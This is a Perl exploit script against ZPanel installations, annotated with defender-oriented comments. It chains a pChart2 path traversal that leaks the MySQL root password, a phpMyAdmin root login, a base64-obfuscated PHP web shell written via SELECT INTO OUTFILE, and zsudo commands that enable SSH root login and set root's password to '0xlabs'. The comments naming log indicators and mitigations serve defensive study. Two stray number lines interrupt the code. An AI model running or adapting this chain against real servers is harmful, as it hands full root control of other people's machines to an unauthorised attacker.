#!/usr/bin/perl
#********************************************************************************
#
#
#                Unauthenticated Zpanel Remote Root Exploit
#                            japp@0xlabs.com
#                         http://www.0xlabs.com
#
#
#********************************************************************************
use LWP::UserAgent;
# Package globals (the file has no `use strict`) holding the three server-side paths the
# script requests. Each is appended to the user-supplied base URL, so all three appear
# verbatim in the target's web server access log.
$FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php";   # pChart2 example viewer; Script= walks up to ZPanel's cnf/db.php
$PMA_PATH        = "etc/apps/phpmyadmin/index.php";    # bundled phpMyAdmin login page
$PMA_DOCROOT     = "etc/apps/phpmyadmin/import.php";   # phpMyAdmin import.php, where GetDocRoot and UploadShell send SQL

# Banner.
print "\n\n";
print "\t================================\n";
print "\t[  Zpanel Remote Root Exploit  ]\n";
print "\t[     By japp\@0xlabs.com       ]\n";
print "\t[       www.0xlabs.com         ]\n";
print "\t================================\n\n";


# Exactly one argument is accepted: the base URL of the ZPanel install.
my $argc = @ARGV;

if ( $argc != 1 )
{
        print " [*] Usage: ".$0." <http://localhost/zpanel/>\n";
        exit 1;
}

# http_handler() returns -1 rather than an object if the agent cannot be built;
# nothing below checks for that before calling methods on $ua.
my $ua = http_handler();
my $url = $ARGV[0];

# Normalise the base URL: prepend a scheme when the argument does not start with
# "http" (so "https://..." is also accepted as-is) and ensure a trailing slash so the
# path constants above can be appended directly.
if ( $url !~ /^http/ ){ $url = "http://".$url; }
if ( $url !~ /\/$/ )  { $url .= "/"; }

# Step 1: read the MySQL root credential out of the disclosed cnf/db.php (GetPasswd).
print " [*] Trying to get MySQL root password...\n";
my $root_pass = GetPasswd ($url, $ua);
print " [+] Mysql root password: ".$root_pass."\n";

# Step 2: log in to the bundled phpMyAdmin as root; $token is the session token
# scraped from the post-login page (AccessPma). Each helper die()s on its own failure
# path, so reaching the next step implies the previous one returned.
print " [*] Trying to access through phpMyAdmin...\n";
my $token = AccessPma ($root_pass, $url, $ua);
print " [+] Login successfully\n";

# Step 3: look up the ZPanel document root in zpanel_core.x_settings (GetDocRoot).
print " [*] Getting Zpanel document root...\n";
my $docroot = GetDocRoot ($token, $url, $ua);
print " [+] Zpanel document root: ".$docroot."\n";

# Step 4: write a one-line PHP file named 0xlabs.php into that document root using
# SELECT ... INTO OUTFILE (UploadShell). The new file and the INTO OUTFILE query are the
# most durable host-side artifacts of this chain.
print " [*] Uploading shell...\n";
UploadShell ($token, $docroot, $url, $ua);
print " [+] Shell uploaded successfully!\n";

# Steps 5-6: through that file, invoke ZPanel's bin/zsudo (presumably a privileged
# helper, judging by the files it is used to modify) to edit the sshd config and then
# set root's password. Neither helper checks its HTTP response.
print " [+] Enabling SSH root login\n";
EnableRoot ($url, $ua);

print " [*] Changing root password...\n";
ChangePasswd ($url, $ua);

# The password announced here is the literal embedded in ChangePasswd; nothing verifies
# that the change actually took effect.
print " [+] Root password changed\n\n";
print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n";
sub ChangePasswd
{
        # Final step of the chain: sends one GET to the PHP file dropped by UploadShell
        # (0xlabs.php, parameter c=) whose argument runs bin/zsudo with a string that
        # pipes "root:0xlabs" into /usr/sbin/chpasswd (the %23 is a URL-encoded '#').
        # The response object is assigned and then discarded, so success is never checked.
        # From the defender's side the request line itself (0xlabs.php, zsudo, chpasswd in
        # the query string) and the resulting root password change are the indicators.
        #
        # Args: $url - normalised base URL with trailing slash; $ua - LWP::UserAgent.
        # Returns: nothing meaningful.
        my $url     = $_[0];
        my $ua      = $_[1];

        my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\"");
}
sub EnableRoot
{
        # Sends one GET through the dropped 0xlabs.php whose c= argument runs bin/zsudo
        # with a string containing an in-place sed that rewrites "PermitRootLogin no" to
        # "PermitRootLogin yes" in /etc/ssh/*hd_config (the %23 is a URL-encoded '#').
        # As in ChangePasswd, the response is discarded, so nothing confirms the edit.
        # Host-side indicators: a modified sshd_config (mtime, PermitRootLogin flipped)
        # written by the web server's user via zsudo.
        #
        # Args: $url - normalised base URL with trailing slash; $ua - LWP::UserAgent.
        # Returns: nothing meaningful.
        my $url     = $_[0];
        my $ua      = $_[1];

        my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\"");

}
sub UploadShell
{
        # Writes a one-line PHP file into the ZPanel document root by running
        # SELECT ... INTO OUTFILE through phpMyAdmin's import.php, then fetches the file
        # once to confirm it executes.
        #
        # Args: $token   - phpMyAdmin session token from AccessPma
        #       $docroot - document root path from GetDocRoot (expected to end in '/')
        #       $url     - normalised base URL; $ua - LWP::UserAgent
        # Dies if the follow-up GET fails or does not echo the marker string.
        # Mitigation notes: INTO OUTFILE needs the FILE privilege on the MySQL account and
        # is refused when secure_file_priv restricts output locations; the query also
        # appears in the MySQL query log if one is enabled.
        my $token   = $_[0];
        my $docroot = $_[1];
        my $url     = $_[2];
        my $ua      = $_[3];

        my %pdata;

        # The base64 literal decodes to `passthru($_GET["c"]);` — the dropped file runs
        # whatever arrives in the c= query parameter. $PMA_DOCROOT is the package global
        # set at the top of the script.
        $pdata{"token"}         = $token;
        $pdata{"sql_query"}     = "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'";
        $pdata{"ajax_request"}  = "true";

        # The import response is discarded; success is inferred only from the GET below.
        http_post ($url.$PMA_DOCROOT, $ua, %pdata);

        my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz");

        if (!$rsp->is_success)
        {
                die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n");
        }
        my $cont = $rsp->content;

        # A 200 alone is not enough (the server might serve the file as text); require
        # the echoed marker to prove the PHP actually ran.
        if ( $cont !~ /0xlabs_rulz/ )
        {
                die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n");
        }
}
111
112
sub GetDocRoot
{
        # Reads ZPanel's document root from its own settings table by running a SELECT
        # through phpMyAdmin's import.php and scraping the first result cell out of the
        # returned HTML.
        #
        # Args: $token - phpMyAdmin session token; $url - normalised base URL;
        #       $ua    - LWP::UserAgent
        # Returns: the cell text, or an undefined/stale $1 if the HTML did not match
        #          (the match result is not checked before `return $1`).
        my $token   = $_[0];
        my $url     = $_[1];
        my $ua      = $_[2];

        my %pdata;

        $pdata{"token"}         = $token;
        $pdata{"sql_query"}     = "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'";
        $pdata{"ajax_request"}  = "true";

        my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata);

        # Scrape the first "data grid_edit" <td> — assumes phpMyAdmin's result-grid
        # markup and that the value contains no '<'.
        $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/;

        return $1;
}
sub AccessPma
{
        # Logs in to the bundled phpMyAdmin as MySQL root with the recovered password and
        # returns the session token needed by later import.php requests. The cookie jar
        # on $ua keeps the resulting session.
        #
        # Args: $root_pass - MySQL root password; $url - normalised base URL;
        #       $ua        - LWP::UserAgent with a cookie jar
        # Dies if the login page is unreachable or phpMyAdmin reports a failed login.
        # Returns: the token scraped from a "?token=" link, or a stale/undefined $1 if
        #          that scrape fails (not checked).
        # Mitigation notes: a root login to phpMyAdmin from a non-local address is the
        # detection point; disallowing root logins to phpMyAdmin and restricting who can
        # reach it break this step.
        my $root_pass   = $_[0];
        my $url         = $_[1];
        my $ua          = $_[2];

        my %pdata;

        my $rsp = $ua->get ($url.$PMA_PATH);

        if (!$rsp->is_success) {
                die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n");
        }

        my $cont = $rsp->content;

        # Anti-CSRF token from the login form. The greedy `.+` runs to the last double
        # quote on the line, so this assumes the token is the final quoted attribute there.
        $cont =~ /name=\"token\" value=\"(.+)\"/;

        my $token = $1;

        $pdata{"pma_username"}          = "root";
        $pdata{"pma_password"}          = $root_pass;
        $pdata{"server"}                = "1";
        $pdata{"lang"}                  = "en";
        $pdata{"collation_connection"}  = "utf8_general_ci";
        $pdata{"token"}                 = $token;

        $cont = http_post ($url.$PMA_PATH, $ua, %pdata);

        # Failure is detected only by phpMyAdmin's English error text; other failure
        # modes (e.g. a localised message) would pass through unnoticed.
        if ( $cont =~ /Cannot log in to the MySQL server/ )
        {
                die (" [-] Cannot log in to phpMyAdmin\n");
        }

        # Post-login pages embed the token in links; take the first "?token=" value.
        $cont =~ /\?token=(.+)\"/;

        return $1;
}
sub GetPasswd
{
        # Recovers the MySQL root password by requesting the pChart2 example viewer with
        # a traversal in its Script= parameter ($FILE_DISCLOSURE, a package global) so
        # that it renders ZPanel's cnf/db.php, then picks the fourth highlighted string
        # literal out of the rendered source.
        #
        # Args: $url - normalised base URL; $ua - LWP::UserAgent
        # Dies if the request fails or the page does not contain "root".
        # Returns: the fourth quoted literal, or falls off the end (no explicit return)
        #          when fewer than four literals match.
        # Mitigation notes: removing the pChart examples directory (or patching the
        # viewer) closes the disclosure; the request path is the log-level indicator.
        my $url = $_[0];
        my $ua  = $_[1];


        my $rsp = $ua->get ($url.$FILE_DISCLOSURE);

        if (!$rsp->is_success) {
                die (" [-] Can't get '".$url."'. Check URL.\n");
        }

        my $cont = $rsp->content;

        # Coarse sanity check that the config was actually disclosed.
        if ( $cont !~ /root/ )
        {
                die (" [-] Can't get root password. Patched?\n");
        }

        # #DD0000 is presumably the colour the viewer's PHP source highlighter assigns
        # to string literals (it matches PHP's default highlight.string) — TODO confirm.
        # Each match is a quoted literal; the fourth one is assumed to be the password,
        # which depends on the layout of cnf/db.php and is not verified here.
        my $flag = 0;
        while ( $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g )
        {
                $flag++;
                if ( $flag == 4 )
                {
                        return $1;
                }
        }

 }
sub http_post
{
        # Form-encoded POST helper: flattens the trailing key/value pairs into the
        # arrayref form LWP::UserAgent::post expects and returns only the response body.
        #
        # Args: $host - full URL; $ua - LWP::UserAgent; %data - form fields
        # Returns: the response content (no status check is performed).
        my ($host, $ua, %data) = @_;

        my @form     = %data;
        my $response = $ua->post ($host, \@form);

        return ($response->content);
}
sub http_handler
{
        # Builds the LWP::UserAgent every request in this script goes through.
        #
        # Returns: the configured agent, or -1 if the constructor yields a false value
        #          (callers in this file do not check for that).
        my $agent = LWP::UserAgent->new() or return -1;

        # Browser-like User-Agent string, a 10 s timeout, http/https only, and an
        # in-memory cookie jar (an empty hashref selects LWP's default jar) so the
        # phpMyAdmin session survives across calls.
        $agent->agent ("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6");
        $agent->timeout(10);
        $agent->protocols_allowed(['http','https']);
        $agent->cookie_jar( {} );

        # Follow redirects for both GET and POST requests.
        push @{ $agent->requests_redirectable }, 'GET', 'POST';

        return $agent;
}